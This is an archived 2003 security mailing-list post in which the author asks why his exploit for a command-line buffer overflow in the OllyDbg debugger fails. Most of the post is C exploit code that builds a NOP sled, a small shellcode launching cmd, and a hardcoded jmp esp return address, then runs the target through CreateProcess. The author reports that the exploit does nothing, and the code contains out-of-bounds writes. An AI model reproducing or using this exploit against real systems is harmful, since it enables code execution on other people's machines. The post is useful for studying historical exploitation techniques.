win32 command line overflows: (ex: ollydbg.exe)

From: wirepair (wirepairat_private)
Date: Thu Jun 05 2003 - 05:24:45 PDT

Next message: Olivier DEMBOUR: "Re: win32 shellcoding"

Previous message: Dave: "Exploiting new IE Object Type Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello all, Just messing around with win32 overflows, and 
i've run into a small problem with command line overflows. 
Ollydbg has a buffer overflow when you call a program with 
a large command line. (I found this when trying to debug 
rasphone.exe in WinXP (rasphone -f <1000'a>) I was 
expecting Ollydbg to run the program but it crashed itself 
"Error in Instruction 0x41414141 while trying to 'read' 
0x41414141. So I tried to write an exploit for Ollydbg. 
Issue #2 Visual C++ crashes as well when i'm trying to 
debug ollydbg so I have to do this blindly. My exploit 
buffer looks like:
ollydbg.exe ollydbg.exe <200 NOPS>Shellcode<more 
nops>[&EIP]<nops>
I'm trying to use CreateProcess to call ollydbg.exe but it 
doesn't do anything, no crash no nothing. So i saved the 
exploit buffer to a file and tried to 'paste' it (heh). It 
doesn't crash even though there are over 600 characters... 
(Ollydbg.exe overwrites EIP at 508-511, i think i can't 
debug it!)
Anyways here's my code any insite on why this isn't 
working is greatly appreciated:
#include <windows.h>
#include <stdio.h>
#include <string.h>


int main(int argc, char **argv) {
	char exp_buff[1024];
	int x,i;
	char ollyfile[100];
     DWORD jmpesp = 0x77E9AE59; // jmp esp call in 
kernel32.dll
	unsigned char shellcode[19] = 
"\xC7\x45\xFD\x63\x6D\x64\x20\x8D\x45\xFD\x50\xB8\x35\xFD\xE6\x77\xFF\xD0"; 
//tiny sc
	PROCESS_INFORMATION pi;
	STARTUPINFO si;

	if (argc != 2) {
		fprintf(stderr, "heh: %s <path to olly>\n", argv[0]);
		exit(1);
	}
	strncpy(ollyfile, argv[1], 99);
	ollyfile[100] = 0x00;
	
	x = strlen(ollyfile);
	memset(exp_buff, 0x90, 1024); 
     
	memcpy(exp_buff, ollyfile, x);
	exp_buff[x] = ' ';
      

	memcpy(exp_buff+200, &shellcode, 19);
	exp_buff[218] = 0x90;
	for (i = 219; i <= 508; i++) {
		exp_buff[i] = 0x90;
	}
	exp_buff[1024] = 0x00;
	memcpy(exp_buff+508, &jmpesp, 4);
	fprintf(stderr, "%s", exp_buff); //debugging heh
	CreateProcess("E:\\ollydbg\\ollydbg.exe", exp_buff, NULL, 
NULL, FALSE, 0, NULL, NULL, &si, &pi);
	
	return(0);
}

Thanks
-wire
_____________________________
For the best comics, toys, movies, and more,
please visit <http://www.tfaw.com/?qt=wmf>

Next message: Olivier DEMBOUR: "Re: win32 shellcoding"
Previous message: Dave: "Exploiting new IE Object Type Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jun 05 2003 - 11:34:07 PDT